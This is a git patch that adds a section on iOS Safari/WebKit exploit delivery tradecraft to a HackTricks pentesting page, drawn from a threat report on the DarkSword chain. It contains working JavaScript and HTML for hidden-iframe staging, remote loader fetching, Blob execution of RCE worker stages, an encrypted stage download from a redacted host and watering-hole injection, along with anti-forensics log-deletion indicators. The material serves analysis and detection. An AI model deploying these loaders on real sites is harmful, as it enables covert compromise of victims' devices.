From 272d2a0b0fc6dc5380fef01d48fa7932338a1e2f Mon Sep 17 00:00:00 2001
From: HackTricks News Bot <bot@hacktricks.xyz>
Date: Thu, 19 Mar 2026 13:14:26 +0000
Subject: [PATCH] Add content from: The Proliferation of DarkSword: iOS Exploit
 Chain Adopted by...

---
 .../ios-pentesting/ios-webviews.md            | 107 +++++++++++++++++-
 1 file changed, 106 insertions(+), 1 deletion(-)

diff --git a/src/mobile-pentesting/ios-pentesting/ios-webviews.md b/src/mobile-pentesting/ios-pentesting/ios-webviews.md
index 76bc1042036..763572ae5dd 100644
--- a/src/mobile-pentesting/ios-pentesting/ios-webviews.md
+++ b/src/mobile-pentesting/ios-pentesting/ios-webviews.md
@@ -284,6 +284,110 @@ class JavaScriptBridgeMessageHandler: NSObject, WKScriptMessageHandler {
 }
 ```
 
+
+## iOS Web Exploit Delivery & Staging Tradecraft
+
+The following patterns have been observed in real-world iOS Safari/WebKit exploit delivery chains and are useful for analysis, detection, and controlled emulation.
+
+### Multi-stage loader via hidden iframes
+
+A common staging pattern is to gate execution to avoid reinfection or analysis and then inject a hidden/off-screen `iframe` for the next stage:
+
+```html
+<script>
+if (!sessionStorage.getItem('uid') && isTouchScreen) {
+  sessionStorage.setItem('uid', '1');
+  const frame = document.createElement('iframe');
+  frame.src = 'frame.html?' + Math.random();
+  frame.style.height = 0;
+  frame.style.width = 0;
+  frame.style.border = 'none';
+  document.body.appendChild(frame);
+} else {
+  top.location.href = 'red';
+}
+</script>
+```
+
+A minimal staging page can inject the main loader via `document.write()`:
+
+```html
+<script>
+  document.write('<script defer="defer" src="rce_loader.js"><\/script>');
+</script>
+```
+
+Loader stages frequently pull subsequent JavaScript synchronously:
+
+```javascript
+function getJS(fname) {
+  const xhr = new XMLHttpRequest();
+  xhr.open('GET', fname, false);
+  xhr.send(null);
+  return xhr.responseText;
+}
+```
+
+Later stages can be executed in a worker-like context by building a Blob URL:
+
+```javascript
+const workerCode = getJS('rce_worker_18.4.js');
+const workerBlob = new Blob([workerCode], { type: 'text/javascript' });
+const workerBlobUrl = URL.createObjectURL(workerBlob);
+```
+
+### Forcing Safari to hit the WebKit/JSC surface
+
+If a victim opens a lure in another browser, a protocol handler can force Safari:
+
+```javascript
+if (typeof browser === 'undefined' && isIphone()) {
+  location.href = 'x-safari-https://example.com/<redacted>';
+}
+```
+
+### Encrypted stage fetch (ECDH + AES)
+
+Some loaders encrypt exploit stages in transit. A minimal client flow is: generate an ephemeral ECDH keypair, POST the base64 public key, receive encrypted blobs, derive an AES key, decrypt, then decode to JavaScript:
+
+```javascript
+const kp = generateKeyPair();
+const pubPem = exportPublicKeyAsPem(kp.publicKey);
+const xhr = new XMLHttpRequest();
+xhr.open('POST', 'https://<redacted>/stage?'+Date.now(), false);
+xhr.setRequestHeader('Content-Type', 'application/json');
+xhr.send(JSON.stringify({ a: btoa(pubPem) }));
+const { a, b } = JSON.parse(xhr.responseText);
+const aesKey = deriveAesKey(kp.privateKey, b64toUint8Array(b));
+const js = new TextDecoder().decode(decryptData(b64toUint8Array(a), aesKey));
+```
+
+### Watering-hole injection pattern
+
+Compromised sites can load a remote script that builds an off-screen `iframe` and constrains it with a sandbox while still allowing script execution:
+
+```html
+<script async src="https://static.example.net/widgets.js?token"></script>
+```
+
+```javascript
+const iframe = document.createElement('iframe');
+iframe.src = 'https://static.example.net/assets/index.html';
+iframe.style.width = '1px';
+iframe.style.height = '1px';
+iframe.style.position = 'absolute';
+iframe.style.left = '-9999px';
+iframe.style.opacity = '0.01';
+iframe.setAttribute('sandbox', 'allow-scripts allow-same-origin');
+document.body.appendChild(iframe);
+```
+
+### Post-exploitation anti-forensics indicators (JS implants)
+
+- Temporary staging under `/tmp/<uuid>.<digits>/` with subfolders like `STORAGE`, `DATA`, and `TMP`.
+- Deletion of crash logs in `/var/mobile/Library/Logs/CrashReporter/` (often filtered by WebKit/SpringBoard substrings).
+- Recursive deletion of `/private/var/containers/Shared/SystemGroup/systemgroup.com.apple.osanalytics/DiagnosticReports/`.
+
 ## Debugging iOS WebViews
 
 (Tutorial based on the one from [https://blog.vuplex.com/debugging-webviews](https://blog.vuplex.com/debugging-webviews))
@@ -303,6 +407,8 @@ However, be mindful of the limitations:
 
 ## References
 
+- [https://cloud.google.com/blog/topics/threat-intelligence/darksword-ios-exploit-chain/](https://cloud.google.com/blog/topics/threat-intelligence/darksword-ios-exploit-chain/)
+
 - [https://mobile-security.gitbook.io/mobile-security-testing-guide/ios-testing-guide/0x06h-testing-platform-interaction#testing-webview-protocol-handlers-mstg-platform-6](https://mobile-security.gitbook.io/mobile-security-testing-guide/ios-testing-guide/0x06h-testing-platform-interaction#testing-webview-protocol-handlers-mstg-platform-6)
 - [https://github.com/authenticationfailure/WheresMyBrowser.iOS](https://github.com/authenticationfailure/WheresMyBrowser.iOS)
 - [https://github.com/chame1eon/owasp-mstg/blob/master/Document/0x06h-Testing-Platform-Interaction.md](https://github.com/chame1eon/owasp-mstg/blob/master/Document/0x06h-Testing-Platform-Interaction.md)
@@ -310,4 +416,3 @@ However, be mindful of the limitations:
 {{#include ../../banners/hacktricks-training.md}}
 
 
-